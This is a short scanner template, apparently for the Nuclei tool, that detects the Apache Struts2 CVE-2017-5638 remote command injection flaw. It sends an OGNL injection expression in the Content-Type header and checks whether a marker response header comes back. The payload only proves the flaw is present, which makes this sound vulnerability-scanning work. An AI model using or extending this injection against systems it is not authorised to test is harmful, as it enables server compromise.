id: CVE-2017-5638
info:
  author: Random_Robbie
  name: Apache Struts2 RCE
  severity: critical
  description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
  tags: cve,cve2017,struts,rce,apache
  reference: https://github.com/mazen160/struts-pwn

requests:
  - raw:
      - |
          GET / HTTP/1.1
          Host: {{Hostname}}
          Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
          Accept-Language: en
          Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
          Connection: Keep-Alive
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
          Pragma: no-cache
          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

    matchers:
      - type: word
        words:
          - "X-Hacker: Bounty Plz"
        part: header